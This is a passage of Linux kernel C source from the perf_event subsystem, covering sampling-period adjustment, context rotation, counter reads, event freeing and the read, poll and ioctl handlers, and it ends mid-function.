static DEFINE_PER_CPU(u64, perf_throttled_seq);
static void perf_adjust_period(struct perf_event *event, u64 nsec, u64 count, bool disable)
{
struct hw_perf_event *hwc = &event->hw;
s64 period, sample_period;
s64 delta;
period = perf_calculate_period(event, nsec, count);
delta = (s64)(period - hwc->sample_period);
delta = (delta + 7) / 8; /* low pass filter */
sample_period = hwc->sample_period + delta;
if (!sample_period)
sample_period = 1;
hwc->sample_period = sample_period;
if (local64_read(&hwc->period_left) > 8*sample_period) {
if (disable)
event->pmu->stop(event, PERF_EF_UPDATE);
local64_set(&hwc->period_left, 0);
if (disable)
event->pmu->start(event, PERF_EF_RELOAD);
}
}
/*
* combine freq adjustment with unthrottling to avoid two passes over the
* events. At the same time, make sure, having freq events does not change
* the rate of unthrottling as that would introduce bias.
*/
static void perf_adjust_freq_unthr_context(struct perf_event_context *ctx,
int needs_unthr)
{
struct perf_event *event;
struct hw_perf_event *hwc;
u64 now, period = TICK_NSEC;
s64 delta;
/*
* only need to iterate over all events iff:
* - context have events in frequency mode (needs freq adjust)
* - there are events to unthrottle on this cpu
*/
if (!(ctx->nr_freq || needs_unthr))
return;
raw_spin_lock(&ctx->lock);
perf_pmu_disable(ctx->pmu);
list_for_each_entry_rcu(event, &ctx->event_list, event_entry) {
if (event->state != PERF_EVENT_STATE_ACTIVE)
continue;
if (!event_filter_match(event))
continue;
perf_pmu_disable(event->pmu);
hwc = &event->hw;
if (hwc->interrupts == MAX_INTERRUPTS) {
hwc->interrupts = 0;
perf_log_throttle(event, 1);
event->pmu->start(event, 0);
}
if (!event->attr.freq || !event->attr.sample_freq)
goto next;
/*
* stop the event and update event->count
*/
event->pmu->stop(event, PERF_EF_UPDATE);
now = local64_read(&event->count);
delta = now - hwc->freq_count_stamp;
hwc->freq_count_stamp = now;
/*
* restart the event
* reload only if value has changed
* we have stopped the event so tell that
* to perf_adjust_period() to avoid stopping it
* twice.
*/
if (delta > 0)
perf_adjust_period(event, period, delta, false);
event->pmu->start(event, delta > 0 ? PERF_EF_RELOAD : 0);
next:
perf_pmu_enable(event->pmu);
}
perf_pmu_enable(ctx->pmu);
raw_spin_unlock(&ctx->lock);
}
/*
* Round-robin a context's events:
*/
static void rotate_ctx(struct perf_event_context *ctx)
{
/*
* Rotate the first entry last of non-pinned groups. Rotation might be
* disabled by the inheritance code.
*/
if (!ctx->rotate_disable)
list_rotate_left(&ctx->flexible_groups);
}
static int perf_rotate_context(struct perf_cpu_context *cpuctx)
{
struct perf_event_context *ctx = NULL;
int rotate = 0;
if (cpuctx->ctx.nr_events) {
if (cpuctx->ctx.nr_events != cpuctx->ctx.nr_active)
rotate = 1;
}
ctx = cpuctx->task_ctx;
if (ctx && ctx->nr_events) {
if (ctx->nr_events != ctx->nr_active)
rotate = 1;
}
if (!rotate)
goto done;
perf_ctx_lock(cpuctx, cpuctx->task_ctx);
perf_pmu_disable(cpuctx->ctx.pmu);
cpu_ctx_sched_out(cpuctx, EVENT_FLEXIBLE);
if (ctx)
ctx_sched_out(ctx, cpuctx, EVENT_FLEXIBLE);
rotate_ctx(&cpuctx->ctx);
if (ctx)
rotate_ctx(ctx);
perf_event_sched_in(cpuctx, ctx, current);
perf_pmu_enable(cpuctx->ctx.pmu);
perf_ctx_unlock(cpuctx, cpuctx->task_ctx);
done:
return rotate;
}
void perf_event_task_tick(void)
{
struct list_head *head = this_cpu_ptr(&active_ctx_list);
struct perf_event_context *ctx, *tmp;
int throttled;
WARN_ON(!irqs_disabled());
__this_cpu_inc(perf_throttled_seq);
throttled = __this_cpu_xchg(perf_throttled_count, 0);
tick_dep_clear_cpu(smp_processor_id(), TICK_DEP_BIT_PERF_EVENTS);
list_for_each_entry_safe(ctx, tmp, head, active_ctx_list)
perf_adjust_freq_unthr_context(ctx, throttled);
}
static int event_enable_on_exec(struct perf_event *event,
struct perf_event_context *ctx)
{
if (!event->attr.enable_on_exec)
return 0;
event->attr.enable_on_exec = 0;
if (event->state >= PERF_EVENT_STATE_INACTIVE)
return 0;
__perf_event_mark_enabled(event);
return 1;
}
/*
* Enable all of a task's events that have been marked enable-on-exec.
* This expects task == current.
*/
static void perf_event_enable_on_exec(int ctxn)
{
struct perf_event_context *ctx, *clone_ctx = NULL;
enum event_type_t event_type = 0;
struct perf_cpu_context *cpuctx;
struct perf_event *event;
unsigned long flags;
int enabled = 0;
local_irq_save(flags);
ctx = current->perf_event_ctxp[ctxn];
if (!ctx || !ctx->nr_events)
goto out;
cpuctx = __get_cpu_context(ctx);
perf_ctx_lock(cpuctx, ctx);
ctx_sched_out(ctx, cpuctx, EVENT_TIME);
list_for_each_entry(event, &ctx->event_list, event_entry) {
enabled |= event_enable_on_exec(event, ctx);
event_type |= get_event_type(event);
}
/*
* Unclone and reschedule this context if we enabled any event.
*/
if (enabled) {
clone_ctx = unclone_ctx(ctx);
ctx_resched(cpuctx, ctx, event_type);
} else {
ctx_sched_in(ctx, cpuctx, EVENT_TIME, current);
}
perf_ctx_unlock(cpuctx, ctx);
out:
local_irq_restore(flags);
if (clone_ctx)
put_ctx(clone_ctx);
}
struct perf_read_data {
struct perf_event *event;
bool group;
int ret;
};
static int __perf_event_read_cpu(struct perf_event *event, int event_cpu)
{
u16 local_pkg, event_pkg;
if (event->group_caps & PERF_EV_CAP_READ_ACTIVE_PKG) {
int local_cpu = smp_processor_id();
event_pkg = topology_physical_package_id(event_cpu);
local_pkg = topology_physical_package_id(local_cpu);
if (event_pkg == local_pkg)
return local_cpu;
}
return event_cpu;
}
/*
* Cross CPU call to read the hardware event
*/
static void __perf_event_read(void *info)
{
struct perf_read_data *data = info;
struct perf_event *sub, *event = data->event;
struct perf_event_context *ctx = event->ctx;
struct perf_cpu_context *cpuctx = __get_cpu_context(ctx);
struct pmu *pmu = event->pmu;
/*
* If this is a task context, we need to check whether it is
* the current task context of this cpu. If not it has been
* scheduled out before the smp call arrived. In that case
* event->count would have been updated to a recent sample
* when the event was scheduled out.
*/
if (ctx->task && cpuctx->task_ctx != ctx)
return;
raw_spin_lock(&ctx->lock);
if (ctx->is_active) {
update_context_time(ctx);
update_cgrp_time_from_event(event);
}
update_event_times(event);
if (event->state != PERF_EVENT_STATE_ACTIVE)
goto unlock;
if (!data->group) {
pmu->read(event);
data->ret = 0;
goto unlock;
}
pmu->start_txn(pmu, PERF_PMU_TXN_READ);
pmu->read(event);
list_for_each_entry(sub, &event->sibling_list, group_entry) {
update_event_times(sub);
if (sub->state == PERF_EVENT_STATE_ACTIVE) {
/*
* Use sibling's PMU rather than @event's since
* sibling could be on different (eg: software) PMU.
*/
sub->pmu->read(sub);
}
}
data->ret = pmu->commit_txn(pmu);
unlock:
raw_spin_unlock(&ctx->lock);
}
static inline u64 perf_event_count(struct perf_event *event)
{
if (event->pmu->count)
return event->pmu->count(event);
return __perf_event_count(event);
}
/*
* NMI-safe method to read a local event, that is an event that
* is:
* - either for the current task, or for this CPU
* - does not have inherit set, for inherited task events
* will not be local and we cannot read them atomically
* - must not have a pmu::count method
*/
u64 perf_event_read_local(struct perf_event *event)
{
unsigned long flags;
u64 val;
/*
* Disabling interrupts avoids all counter scheduling (context
* switches, timer based rotation and IPIs).
*/
local_irq_save(flags);
/* If this is a per-task event, it must be for current */
WARN_ON_ONCE((event->attach_state & PERF_ATTACH_TASK) &&
event->hw.target != current);
/* If this is a per-CPU event, it must be for this CPU */
WARN_ON_ONCE(!(event->attach_state & PERF_ATTACH_TASK) &&
event->cpu != smp_processor_id());
/*
* It must not be an event with inherit set, we cannot read
* all child counters from atomic context.
*/
WARN_ON_ONCE(event->attr.inherit);
/*
* It must not have a pmu::count method, those are not
* NMI safe.
*/
WARN_ON_ONCE(event->pmu->count);
/*
* If the event is currently on this CPU, its either a per-task event,
* or local to this CPU. Furthermore it means its ACTIVE (otherwise
* oncpu == -1).
*/
if (event->oncpu == smp_processor_id())
event->pmu->read(event);
val = local64_read(&event->count);
local_irq_restore(flags);
return val;
}
static int perf_event_read(struct perf_event *event, bool group)
{
int event_cpu, ret = 0;
/*
* If event is enabled and currently active on a CPU, update the
* value in the event structure:
*/
if (event->state == PERF_EVENT_STATE_ACTIVE) {
struct perf_read_data data = {
.event = event,
.group = group,
.ret = 0,
};
event_cpu = READ_ONCE(event->oncpu);
if ((unsigned)event_cpu >= nr_cpu_ids)
return 0;
preempt_disable();
event_cpu = __perf_event_read_cpu(event, event_cpu);
/*
* Purposely ignore the smp_call_function_single() return
* value.
*
* If event_cpu isn't a valid CPU it means the event got
* scheduled out and that will have updated the event count.
*
* Therefore, either way, we'll have an up-to-date event count
* after this.
*/
(void)smp_call_function_single(event_cpu, __perf_event_read, &data, 1);
preempt_enable();
ret = data.ret;
} else if (event->state == PERF_EVENT_STATE_INACTIVE) {
struct perf_event_context *ctx = event->ctx;
unsigned long flags;
raw_spin_lock_irqsave(&ctx->lock, flags);
/*
* may read while context is not active
* (e.g., thread is blocked), in that case
* we cannot update context time
*/
if (ctx->is_active) {
update_context_time(ctx);
update_cgrp_time_from_event(event);
}
if (group)
update_group_times(event);
else
update_event_times(event);
raw_spin_unlock_irqrestore(&ctx->lock, flags);
}
return ret;
}
/*
* Initialize the perf_event context in a task_struct:
*/
static void __perf_event_init_context(struct perf_event_context *ctx)
{
raw_spin_lock_init(&ctx->lock);
mutex_init(&ctx->mutex);
INIT_LIST_HEAD(&ctx->active_ctx_list);
INIT_LIST_HEAD(&ctx->pinned_groups);
INIT_LIST_HEAD(&ctx->flexible_groups);
INIT_LIST_HEAD(&ctx->event_list);
atomic_set(&ctx->refcount, 1);
}
static struct perf_event_context *
alloc_perf_context(struct pmu *pmu, struct task_struct *task)
{
struct perf_event_context *ctx;
ctx = kzalloc(sizeof(struct perf_event_context), GFP_KERNEL);
if (!ctx)
return NULL;
__perf_event_init_context(ctx);
if (task) {
ctx->task = task;
get_task_struct(task);
}
ctx->pmu = pmu;
return ctx;
}
static struct task_struct *
find_lively_task_by_vpid(pid_t vpid)
{
struct task_struct *task;
rcu_read_lock();
if (!vpid)
task = current;
else
task = find_task_by_vpid(vpid);
if (task)
get_task_struct(task);
rcu_read_unlock();
if (!task)
return ERR_PTR(-ESRCH);
return task;
}
/*
* Returns a matching context with refcount and pincount.
*/
static struct perf_event_context *
find_get_context(struct pmu *pmu, struct task_struct *task,
struct perf_event *event)
{
struct perf_event_context *ctx, *clone_ctx = NULL;
struct perf_cpu_context *cpuctx;
void *task_ctx_data = NULL;
unsigned long flags;
int ctxn, err;
int cpu = event->cpu;
if (!task) {
/* Must be root to operate on a CPU event: */
if (perf_paranoid_cpu() && !capable(CAP_SYS_ADMIN))
return ERR_PTR(-EACCES);
/*
* We could be clever and allow to attach a event to an
* offline CPU and activate it when the CPU comes up, but
* that's for later.
*/
if (!cpu_online(cpu))
return ERR_PTR(-ENODEV);
cpuctx = per_cpu_ptr(pmu->pmu_cpu_context, cpu);
ctx = &cpuctx->ctx;
get_ctx(ctx);
++ctx->pin_count;
return ctx;
}
err = -EINVAL;
ctxn = pmu->task_ctx_nr;
if (ctxn < 0)
goto errout;
if (event->attach_state & PERF_ATTACH_TASK_DATA) {
task_ctx_data = kzalloc(pmu->task_ctx_size, GFP_KERNEL);
if (!task_ctx_data) {
err = -ENOMEM;
goto errout;
}
}
retry:
ctx = perf_lock_task_context(task, ctxn, &flags);
if (ctx) {
clone_ctx = unclone_ctx(ctx);
++ctx->pin_count;
if (task_ctx_data && !ctx->task_ctx_data) {
ctx->task_ctx_data = task_ctx_data;
task_ctx_data = NULL;
}
raw_spin_unlock_irqrestore(&ctx->lock, flags);
if (clone_ctx)
put_ctx(clone_ctx);
} else {
ctx = alloc_perf_context(pmu, task);
err = -ENOMEM;
if (!ctx)
goto errout;
if (task_ctx_data) {
ctx->task_ctx_data = task_ctx_data;
task_ctx_data = NULL;
}
err = 0;
mutex_lock(&task->perf_event_mutex);
/*
* If it has already passed perf_event_exit_task().
* we must see PF_EXITING, it takes this mutex too.
*/
if (task->flags & PF_EXITING)
err = -ESRCH;
else if (task->perf_event_ctxp[ctxn])
err = -EAGAIN;
else {
get_ctx(ctx);
++ctx->pin_count;
rcu_assign_pointer(task->perf_event_ctxp[ctxn], ctx);
}
mutex_unlock(&task->perf_event_mutex);
if (unlikely(err)) {
put_ctx(ctx);
if (err == -EAGAIN)
goto retry;
goto errout;
}
}
kfree(task_ctx_data);
return ctx;
errout:
kfree(task_ctx_data);
return ERR_PTR(err);
}
static void perf_event_free_filter(struct perf_event *event);
static void perf_event_free_bpf_prog(struct perf_event *event);
static void free_event_rcu(struct rcu_head *head)
{
struct perf_event *event;
event = container_of(head, struct perf_event, rcu_head);
if (event->ns)
put_pid_ns(event->ns);
perf_event_free_filter(event);
kfree(event);
}
static void ring_buffer_attach(struct perf_event *event,
struct ring_buffer *rb);
static void detach_sb_event(struct perf_event *event)
{
struct pmu_event_list *pel = per_cpu_ptr(&pmu_sb_events, event->cpu);
raw_spin_lock(&pel->lock);
list_del_rcu(&event->sb_list);
raw_spin_unlock(&pel->lock);
}
static bool is_sb_event(struct perf_event *event)
{
struct perf_event_attr *attr = &event->attr;
if (event->parent)
return false;
if (event->attach_state & PERF_ATTACH_TASK)
return false;
if (attr->mmap || attr->mmap_data || attr->mmap2 ||
attr->comm || attr->comm_exec ||
attr->task ||
attr->context_switch)
return true;
return false;
}
static void unaccount_pmu_sb_event(struct perf_event *event)
{
if (is_sb_event(event))
detach_sb_event(event);
}
static void unaccount_event_cpu(struct perf_event *event, int cpu)
{
if (event->parent)
return;
if (is_cgroup_event(event))
atomic_dec(&per_cpu(perf_cgroup_events, cpu));
}
#ifdef CONFIG_NO_HZ_FULL
static DEFINE_SPINLOCK(nr_freq_lock);
#endif
static void unaccount_freq_event_nohz(void)
{
#ifdef CONFIG_NO_HZ_FULL
spin_lock(&nr_freq_lock);
if (atomic_dec_and_test(&nr_freq_events))
tick_nohz_dep_clear(TICK_DEP_BIT_PERF_EVENTS);
spin_unlock(&nr_freq_lock);
#endif
}
static void unaccount_freq_event(void)
{
if (tick_nohz_full_enabled())
unaccount_freq_event_nohz();
else
atomic_dec(&nr_freq_events);
}
static void unaccount_event(struct perf_event *event)
{
bool dec = false;
if (event->parent)
return;
if (event->attach_state & PERF_ATTACH_TASK)
dec = true;
if (event->attr.mmap || event->attr.mmap_data)
atomic_dec(&nr_mmap_events);
if (event->attr.comm)
atomic_dec(&nr_comm_events);
if (event->attr.task)
atomic_dec(&nr_task_events);
if (event->attr.freq)
unaccount_freq_event();
if (event->attr.context_switch) {
dec = true;
atomic_dec(&nr_switch_events);
}
if (is_cgroup_event(event))
dec = true;
if (has_branch_stack(event))
dec = true;
if (dec) {
if (!atomic_add_unless(&perf_sched_count, -1, 1))
schedule_delayed_work(&perf_sched_work, HZ);
}
unaccount_event_cpu(event, event->cpu);
unaccount_pmu_sb_event(event);
}
static void perf_sched_delayed(struct work_struct *work)
{
mutex_lock(&perf_sched_mutex);
if (atomic_dec_and_test(&perf_sched_count))
static_branch_disable(&perf_sched_events);
mutex_unlock(&perf_sched_mutex);
}
/*
* The following implement mutual exclusion of events on "exclusive" pmus
* (PERF_PMU_CAP_EXCLUSIVE). Such pmus can only have one event scheduled
* at a time, so we disallow creating events that might conflict, namely:
*
* 1) cpu-wide events in the presence of per-task events,
* 2) per-task events in the presence of cpu-wide events,
* 3) two matching events on the same context.
*
* The former two cases are handled in the allocation path (perf_event_alloc(),
* _free_event()), the latter -- before the first perf_install_in_context().
*/
static int exclusive_event_init(struct perf_event *event)
{
struct pmu *pmu = event->pmu;
if (!(pmu->capabilities & PERF_PMU_CAP_EXCLUSIVE))
return 0;
/*
* Prevent co-existence of per-task and cpu-wide events on the
* same exclusive pmu.
*
* Negative pmu::exclusive_cnt means there are cpu-wide
* events on this "exclusive" pmu, positive means there are
* per-task events.
*
* Since this is called in perf_event_alloc() path, event::ctx
* doesn't exist yet; it is, however, safe to use PERF_ATTACH_TASK
* to mean "per-task event", because unlike other attach states it
* never gets cleared.
*/
if (event->attach_state & PERF_ATTACH_TASK) {
if (!atomic_inc_unless_negative(&pmu->exclusive_cnt))
return -EBUSY;
} else {
if (!atomic_dec_unless_positive(&pmu->exclusive_cnt))
return -EBUSY;
}
return 0;
}
static void exclusive_event_destroy(struct perf_event *event)
{
struct pmu *pmu = event->pmu;
if (!(pmu->capabilities & PERF_PMU_CAP_EXCLUSIVE))
return;
/* see comment in exclusive_event_init() */
if (event->attach_state & PERF_ATTACH_TASK)
atomic_dec(&pmu->exclusive_cnt);
else
atomic_inc(&pmu->exclusive_cnt);
}
static bool exclusive_event_match(struct perf_event *e1, struct perf_event *e2)
{
if ((e1->pmu == e2->pmu) &&
(e1->cpu == e2->cpu ||
e1->cpu == -1 ||
e2->cpu == -1))
return true;
return false;
}
/* Called under the same ctx::mutex as perf_install_in_context() */
static bool exclusive_event_installable(struct perf_event *event,
struct perf_event_context *ctx)
{
struct perf_event *iter_event;
struct pmu *pmu = event->pmu;
if (!(pmu->capabilities & PERF_PMU_CAP_EXCLUSIVE))
return true;
list_for_each_entry(iter_event, &ctx->event_list, event_entry) {
if (exclusive_event_match(iter_event, event))
return false;
}
return true;
}
static void perf_addr_filters_splice(struct perf_event *event,
struct list_head *head);
static void _free_event(struct perf_event *event)
{
irq_work_sync(&event->pending);
unaccount_event(event);
if (event->rb) {
/*
* Can happen when we close an event with re-directed output.
*
* Since we have a 0 refcount, perf_mmap_close() will skip
* over us; possibly making our ring_buffer_put() the last.
*/
mutex_lock(&event->mmap_mutex);
ring_buffer_attach(event, NULL);
mutex_unlock(&event->mmap_mutex);
}
if (is_cgroup_event(event))
perf_detach_cgroup(event);
if (!event->parent) {
if (event->attr.sample_type & PERF_SAMPLE_CALLCHAIN)
put_callchain_buffers();
}
perf_event_free_bpf_prog(event);
perf_addr_filters_splice(event, NULL);
kfree(event->addr_filters_offs);
if (event->destroy)
event->destroy(event);
if (event->ctx)
put_ctx(event->ctx);
exclusive_event_destroy(event);
module_put(event->pmu->module);
call_rcu(&event->rcu_head, free_event_rcu);
}
/*
* Used to free events which have a known refcount of 1, such as in error paths
* where the event isn't exposed yet and inherited events.
*/
static void free_event(struct perf_event *event)
{
if (WARN(atomic_long_cmpxchg(&event->refcount, 1, 0) != 1,
"unexpected event refcount: %ld; ptr=%p\n",
atomic_long_read(&event->refcount), event)) {
/* leak to avoid use-after-free */
return;
}
_free_event(event);
}
/*
* Remove user event from the owner task.
*/
static void perf_remove_from_owner(struct perf_event *event)
{
struct task_struct *owner;
rcu_read_lock();
/*
* Matches the smp_store_release() in perf_event_exit_task(). If we
* observe !owner it means the list deletion is complete and we can
* indeed free this event, otherwise we need to serialize on
* owner->perf_event_mutex.
*/
owner = lockless_dereference(event->owner);
if (owner) {
/*
* Since delayed_put_task_struct() also drops the last
* task reference we can safely take a new reference
* while holding the rcu_read_lock().
*/
get_task_struct(owner);
}
rcu_read_unlock();
if (owner) {
/*
* If we're here through perf_event_exit_task() we're already
* holding ctx->mutex which would be an inversion wrt. the
* normal lock order.
*
* However we can safely take this lock because its the child
* ctx->mutex.
*/
mutex_lock_nested(&owner->perf_event_mutex, SINGLE_DEPTH_NESTING);
/*
* We have to re-check the event->owner field, if it is cleared
* we raced with perf_event_exit_task(), acquiring the mutex
* ensured they're done, and we can proceed with freeing the
* event.
*/
if (event->owner) {
list_del_init(&event->owner_entry);
smp_store_release(&event->owner, NULL);
}
mutex_unlock(&owner->perf_event_mutex);
put_task_struct(owner);
}
}
static void put_event(struct perf_event *event)
{
if (!atomic_long_dec_and_test(&event->refcount))
return;
_free_event(event);
}
/*
* Kill an event dead; while event:refcount will preserve the event
* object, it will not preserve its functionality. Once the last 'user'
* gives up the object, we'll destroy the thing.
*/
int perf_event_release_kernel(struct perf_event *event)
{
struct perf_event_context *ctx = event->ctx;
struct perf_event *child, *tmp;
/*
* If we got here through err_file: fput(event_file); we will not have
* attached to a context yet.
*/
if (!ctx) {
WARN_ON_ONCE(event->attach_state &
(PERF_ATTACH_CONTEXT|PERF_ATTACH_GROUP));
goto no_ctx;
}
if (!is_kernel_event(event))
perf_remove_from_owner(event);
ctx = perf_event_ctx_lock(event);
WARN_ON_ONCE(ctx->parent_ctx);
perf_remove_from_context(event, DETACH_GROUP);
raw_spin_lock_irq(&ctx->lock);
/*
* Mark this even as STATE_DEAD, there is no external reference to it
* anymore.
*
* Anybody acquiring event->child_mutex after the below loop _must_
* also see this, most importantly inherit_event() which will avoid
* placing more children on the list.
*
* Thus this guarantees that we will in fact observe and kill _ALL_
* child events.
*/
event->state = PERF_EVENT_STATE_DEAD;
raw_spin_unlock_irq(&ctx->lock);
perf_event_ctx_unlock(event, ctx);
again:
mutex_lock(&event->child_mutex);
list_for_each_entry(child, &event->child_list, child_list) {
/*
* Cannot change, child events are not migrated, see the
* comment with perf_event_ctx_lock_nested().
*/
ctx = lockless_dereference(child->ctx);
/*
* Since child_mutex nests inside ctx::mutex, we must jump
* through hoops. We start by grabbing a reference on the ctx.
*
* Since the event cannot get freed while we hold the
* child_mutex, the context must also exist and have a !0
* reference count.
*/
get_ctx(ctx);
/*
* Now that we have a ctx ref, we can drop child_mutex, and
* acquire ctx::mutex without fear of it going away. Then we
* can re-acquire child_mutex.
*/
mutex_unlock(&event->child_mutex);
mutex_lock(&ctx->mutex);
mutex_lock(&event->child_mutex);
/*
* Now that we hold ctx::mutex and child_mutex, revalidate our
* state, if child is still the first entry, it didn't get freed
* and we can continue doing so.
*/
tmp = list_first_entry_or_null(&event->child_list,
struct perf_event, child_list);
if (tmp == child) {
perf_remove_from_context(child, DETACH_GROUP);
list_del(&child->child_list);
free_event(child);
/*
* This matches the refcount bump in inherit_event();
* this can't be the last reference.
*/
put_event(event);
}
mutex_unlock(&event->child_mutex);
mutex_unlock(&ctx->mutex);
put_ctx(ctx);
goto again;
}
mutex_unlock(&event->child_mutex);
no_ctx:
put_event(event); /* Must be the 'last' reference */
return 0;
}
EXPORT_SYMBOL_GPL(perf_event_release_kernel);
/*
* Called when the last reference to the file is gone.
*/
static int perf_release(struct inode *inode, struct file *file)
{
perf_event_release_kernel(file->private_data);
return 0;
}
u64 perf_event_read_value(struct perf_event *event, u64 *enabled, u64 *running)
{
struct perf_event *child;
u64 total = 0;
*enabled = 0;
*running = 0;
mutex_lock(&event->child_mutex);
(void)perf_event_read(event, false);
total += perf_event_count(event);
*enabled += event->total_time_enabled +
atomic64_read(&event->child_total_time_enabled);
*running += event->total_time_running +
atomic64_read(&event->child_total_time_running);
list_for_each_entry(child, &event->child_list, child_list) {
(void)perf_event_read(child, false);
total += perf_event_count(child);
*enabled += child->total_time_enabled;
*running += child->total_time_running;
}
mutex_unlock(&event->child_mutex);
return total;
}
EXPORT_SYMBOL_GPL(perf_event_read_value);
static int __perf_read_group_add(struct perf_event *leader,
u64 read_format, u64 *values)
{
struct perf_event *sub;
int n = 1; /* skip @nr */
int ret;
ret = perf_event_read(leader, true);
if (ret)
return ret;
/*
* Since we co-schedule groups, {enabled,running} times of siblings
* will be identical to those of the leader, so we only publish one
* set.
*/
if (read_format & PERF_FORMAT_TOTAL_TIME_ENABLED) {
values[n++] += leader->total_time_enabled +
atomic64_read(&leader->child_total_time_enabled);
}
if (read_format & PERF_FORMAT_TOTAL_TIME_RUNNING) {
values[n++] += leader->total_time_running +
atomic64_read(&leader->child_total_time_running);
}
/*
* Write {count,id} tuples for every sibling.
*/
values[n++] += perf_event_count(leader);
if (read_format & PERF_FORMAT_ID)
values[n++] = primary_event_id(leader);
list_for_each_entry(sub, &leader->sibling_list, group_entry) {
values[n++] += perf_event_count(sub);
if (read_format & PERF_FORMAT_ID)
values[n++] = primary_event_id(sub);
}
return 0;
}
static int perf_read_group(struct perf_event *event,
u64 read_format, char __user *buf)
{
struct perf_event *leader = event->group_leader, *child;
struct perf_event_context *ctx = leader->ctx;
int ret;
u64 *values;
lockdep_assert_held(&ctx->mutex);
values = kzalloc(event->read_size, GFP_KERNEL);
if (!values)
return -ENOMEM;
values[0] = 1 + leader->nr_siblings;
/*
* By locking the child_mutex of the leader we effectively
* lock the child list of all siblings.. XXX explain how.
*/
mutex_lock(&leader->child_mutex);
ret = __perf_read_group_add(leader, read_format, values);
if (ret)
goto unlock;
list_for_each_entry(child, &leader->child_list, child_list) {
ret = __perf_read_group_add(child, read_format, values);
if (ret)
goto unlock;
}
mutex_unlock(&leader->child_mutex);
ret = event->read_size;
if (copy_to_user(buf, values, event->read_size))
ret = -EFAULT;
goto out;
unlock:
mutex_unlock(&leader->child_mutex);
out:
kfree(values);
return ret;
}
static int perf_read_one(struct perf_event *event,
u64 read_format, char __user *buf)
{
u64 enabled, running;
u64 values[4];
int n = 0;
values[n++] = perf_event_read_value(event, &enabled, &running);
if (read_format & PERF_FORMAT_TOTAL_TIME_ENABLED)
values[n++] = enabled;
if (read_format & PERF_FORMAT_TOTAL_TIME_RUNNING)
values[n++] = running;
if (read_format & PERF_FORMAT_ID)
values[n++] = primary_event_id(event);
if (copy_to_user(buf, values, n * sizeof(u64)))
return -EFAULT;
return n * sizeof(u64);
}
static bool is_event_hup(struct perf_event *event)
{
bool no_children;
if (event->state > PERF_EVENT_STATE_EXIT)
return false;
mutex_lock(&event->child_mutex);
no_children = list_empty(&event->child_list);
mutex_unlock(&event->child_mutex);
return no_children;
}
/*
* Read the performance event - simple non blocking version for now
*/
static ssize_t
__perf_read(struct perf_event *event, char __user *buf, size_t count)
{
u64 read_format = event->attr.read_format;
int ret;
/*
* Return end-of-file for a read on a event that is in
* error state (i.e. because it was pinned but it couldn't be
* scheduled on to the CPU at some point).
*/
if (event->state == PERF_EVENT_STATE_ERROR)
return 0;
if (count < event->read_size)
return -ENOSPC;
WARN_ON_ONCE(event->ctx->parent_ctx);
if (read_format & PERF_FORMAT_GROUP)
ret = perf_read_group(event, read_format, buf);
else
ret = perf_read_one(event, read_format, buf);
return ret;
}
static ssize_t
perf_read(struct file *file, char __user *buf, size_t count, loff_t *ppos)
{
struct perf_event *event = file->private_data;
struct perf_event_context *ctx;
int ret;
ctx = perf_event_ctx_lock(event);
ret = __perf_read(event, buf, count);
perf_event_ctx_unlock(event, ctx);
return ret;
}
static unsigned int perf_poll(struct file *file, poll_table *wait)
{
struct perf_event *event = file->private_data;
struct ring_buffer *rb;
unsigned int events = POLLHUP;
poll_wait(file, &event->waitq, wait);
if (is_event_hup(event))
return events;
/*
* Pin the event->rb by taking event->mmap_mutex; otherwise
* perf_event_set_output() can swizzle our rb and make us miss wakeups.
*/
mutex_lock(&event->mmap_mutex);
rb = event->rb;
if (rb)
events = atomic_xchg(&rb->poll, 0);
mutex_unlock(&event->mmap_mutex);
return events;
}
static void _perf_event_reset(struct perf_event *event)
{
(void)perf_event_read(event, false);
local64_set(&event->count, 0);
perf_event_update_userpage(event);
}
/*
* Holding the top-level event's child_mutex means that any
* descendant process that has inherited this event will block
* in perf_event_exit_event() if it goes to exit, thus satisfying the
* task existence requirements of perf_event_enable/disable.
*/
static void perf_event_for_each_child(struct perf_event *event,
void (*func)(struct perf_event *))
{
struct perf_event *child;
WARN_ON_ONCE(event->ctx->parent_ctx);
mutex_lock(&event->child_mutex);
func(event);
list_for_each_entry(child, &event->child_list, child_list)
func(child);
mutex_unlock(&event->child_mutex);
}
static void perf_event_for_each(struct perf_event *event,
void (*func)(struct perf_event *))
{
struct perf_event_context *ctx = event->ctx;
struct perf_event *sibling;
lockdep_assert_held(&ctx->mutex);
event = event->group_leader;
perf_event_for_each_child(event, func);
list_for_each_entry(sibling, &event->sibling_list, group_entry)
perf_event_for_each_child(sibling, func);
}
static void __perf_event_period(struct perf_event *event,
struct perf_cpu_context *cpuctx,
struct perf_event_context *ctx,
void *info)
{
u64 value = *((u64 *)info);
bool active;
if (event->attr.freq) {
event->attr.sample_freq = value;
} else {
event->attr.sample_period = value;
event->hw.sample_period = value;
}
active = (event->state == PERF_EVENT_STATE_ACTIVE);
if (active) {
perf_pmu_disable(ctx->pmu);
/*
* We could be throttled; unthrottle now to avoid the tick
* trying to unthrottle while we already re-started the event.
*/
if (event->hw.interrupts == MAX_INTERRUPTS) {
event->hw.interrupts = 0;
perf_log_throttle(event, 1);
}
event->pmu->stop(event, PERF_EF_UPDATE);
}
local64_set(&event->hw.period_left, 0);
if (active) {
event->pmu->start(event, PERF_EF_RELOAD);
perf_pmu_enable(ctx->pmu);
}
}
static int perf_event_period(struct perf_event *event, u64 __user *arg)
{
u64 value;
if (!is_sampling_event(event))
return -EINVAL;
if (copy_from_user(&value, arg, sizeof(value)))
return -EFAULT;
if (!value)
return -EINVAL;
if (event->attr.freq && value > sysctl_perf_event_sample_rate)
return -EINVAL;
event_function_call(event, __perf_event_period, &value);
return 0;
}
static const struct file_operations perf_fops;
static inline int perf_fget_light(int fd, struct fd *p)
{
struct fd f = fdget(fd);
if (!f.file)
return -EBADF;
if (f.file->f_op != &perf_fops) {
fdput(f);
return -EBADF;
}
*p = f;
return 0;
}
static int perf_event_set_output(struct perf_event *event,
struct perf_event *output_event);
static int perf_event_set_filter(struct perf_event *event, void __user *arg);
static int perf_event_set_bpf_prog(struct perf_event *event, u32 prog_fd);
static long _perf_ioctl(struct perf_event *event, unsigned int cmd, unsigned long arg)
{
void (*func)(struct perf_event *);
u32 flags = arg;
switch (cmd) {
case PERF_EVENT_IOC_ENABLE:
func = _perf_event_enable;
break;
case PERF_EVENT_IOC_DISABLE:
func = _perf_event_disable;
break;
case PERF_EVENT_IOC_RESET:
func = _perf_event_reset;
break;
case PERF_EVENT_IOC_REFRESH:
return _perf_event_refresh(event, arg);
case PERF_EVENT_IOC_PERIOD:
return perf_event_period(event, (u64 __user *)arg);
case PERF_EVENT_IOC_ID:
{
u64 id = primary_event_id(event);
